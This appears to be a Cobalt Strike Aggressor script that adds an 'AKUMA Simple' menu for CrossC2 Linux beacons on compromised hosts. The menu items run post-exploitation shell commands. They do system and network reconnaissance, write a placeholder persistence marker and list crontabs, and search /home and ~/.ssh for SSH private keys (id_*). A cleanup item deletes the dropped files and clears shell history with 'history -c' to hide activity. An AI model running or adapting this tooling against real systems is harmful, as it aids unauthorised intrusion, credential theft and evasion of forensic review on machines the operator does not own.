# AKUMA Simple CrossC2 Menu - Ultra Clean Version
# Zero complex escaping, maximum compatibility

popup ssh {
    separator();
    menu "&AKUMA Simple" {
        item "&Quick Deploy" {
            akuma_simple_deploy($1);
        }
        item "&System Info" {
            akuma_simple_info($1);
        }
        item "&Basic Persist" {
            akuma_simple_persist($1);
        }
        item "&Find Files" {
            akuma_simple_find($1);
        }
        item "&Clean Up" {
            akuma_simple_clean($1);
        }
    }
}

sub akuma_simple_deploy {
    local('$bid');
    $bid = $1;
    
    binput($bid, "# AKUMA Simple Deploy");
    blog($bid, "Starting AKUMA Simple Deploy...");
    
    bshell($bid, "whoami && hostname && id");
    bshell($bid, "mkdir -p /tmp/.test && echo 'Directory created'");
    bshell($bid, "ps aux | head -5");
    
    blog($bid, "AKUMA Simple Deploy Complete!");
}

sub akuma_simple_info {
    local('$bid');
    $bid = $1;
    
    binput($bid, "# AKUMA Simple Info");
    blog($bid, "Gathering system information...");
    
    bshell($bid, "echo '=== BASIC SYSTEM INFO ==='");
    bshell($bid, "whoami && hostname && pwd");
    bshell($bid, "uname -a");
    bshell($bid, "uptime");
    bshell($bid, "id && groups");
    bshell($bid, "echo '=== NETWORK INFO ==='");
    bshell($bid, "ip addr | head -20");
    bshell($bid, "echo '=== PROCESS INFO ==='");
    bshell($bid, "ps aux | head -10");
    
    blog($bid, "AKUMA Simple Info Complete!");
}

sub akuma_simple_persist {
    local('$bid');
    $bid = $1;
    
    binput($bid, "# AKUMA Simple Persist");
    blog($bid, "Installing basic persistence...");
    
    bshell($bid, "echo '=== BASIC PERSISTENCE ==='");
    bshell($bid, "mkdir -p ~/.config");
    bshell($bid, "echo 'test persistence' > ~/.config/.akuma");
    bshell($bid, "ls -la ~/.config/.akuma");
    bshell($bid, "crontab -l");
    
    blog($bid, "AKUMA Simple Persist Complete!");
}

sub akuma_simple_find {
    local('$bid');
    $bid = $1;
    
    binput($bid, "# AKUMA Simple Find");
    blog($bid, "Finding interesting files...");
    
    bshell($bid, "echo '=== FINDING FILES ==='");
    bshell($bid, "find /home -name '*.txt' 2>/dev/null | head -10");
    bshell($bid, "find /home -name '*.pdf' 2>/dev/null | head -5");
    bshell($bid, "find /home -name 'id_*' 2>/dev/null");
    bshell($bid, "ls -la ~/.ssh/ 2>/dev/null");
    
    blog($bid, "AKUMA Simple Find Complete!");
}

sub akuma_simple_clean {
    local('$bid');
    $bid = $1;
    
    binput($bid, "# AKUMA Simple Clean");
    blog($bid, "Basic cleanup...");
    
    bshell($bid, "echo '=== BASIC CLEANUP ==='");
    bshell($bid, "rm -f ~/.config/.akuma");
    bshell($bid, "rm -rf /tmp/.test");
    bshell($bid, "history -c");
    bshell($bid, "echo 'Basic cleanup done'");
    
    blog($bid, "AKUMA Simple Clean Complete!");
}

blog("AKUMA Simple CrossC2 Menu Loaded! Ultra-clean version with zero escaping issues.");
